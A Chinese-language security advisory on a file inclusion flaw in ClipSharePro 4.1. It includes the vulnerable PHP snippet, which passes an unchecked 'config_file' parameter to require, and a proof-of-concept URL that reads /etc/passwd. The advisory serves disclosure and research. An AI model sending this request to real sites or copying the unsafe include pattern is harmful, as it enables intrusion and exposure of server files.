安全研究

安全漏洞
ClipShare "config_file"任意文件包含漏洞

发布日期:2014-03-26
更新日期:2014-03-27

受影响系统:
clipshare ClipShare 4.1
描述:
ClipShare是付费的youtube克隆站点。

ClipSharePro <= 4.1版本没有正确验证/ubr_link_upload.php内的"config_file" GET参数,这可导致通过包含本地或远程资源内的文件,利用此漏洞执行任意PHP代码。成功利用此漏洞需要启用 MULTI_CONFIGS_ENABLED 选项。

<*来源:Saadat Ullah
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

# Exploit Title  : ClipSharePro <= 4.1 Local File Inclusion
# Date           : 2013/3/9
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link  : http://www.clip-share.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

#Local File Inclusion

ClipsharePro is a paid youtube clone script , suffers from Localfile Inclusion vulnerability through
which attacker can include arbitrary file in webapp.

LFI in ubr_link_upload.php
Poc code

if($MULTI_CONFIGS_ENABLED){
    if(isset($_GET['config_file']) && strlen($_GET['config_file']) > 0){ $config_file = $_GET['config_file']; }
    else{ showAlertMessage("<font color='red'>ERROR</font>: Failed to find config_file parameter", 1); }
}
else{ $config_file = $DEFAULT_CONFIG; }

// Load config file
require $config_file;  //including arbitrary file $_GET['config_file']
echo $config_file;


The vulnerability can be exploited as..
http://localhost/clips/ClipSharePro/ubr_link_upload.php?config_file=/etc/passwd


For sucessfully exploitation of this vulnerability you need $MULTI_CONFIGS_ENABLED to be 1 in the config file..
In ubr_ini.php

$MULTI_CONFIGS_ENABLED       = 1; --->This value should have to be 1

#Independent Pakistani Security Researcher

建议:
厂商补丁:

clipshare
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.clip-share.com/

浏览次数:2869
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障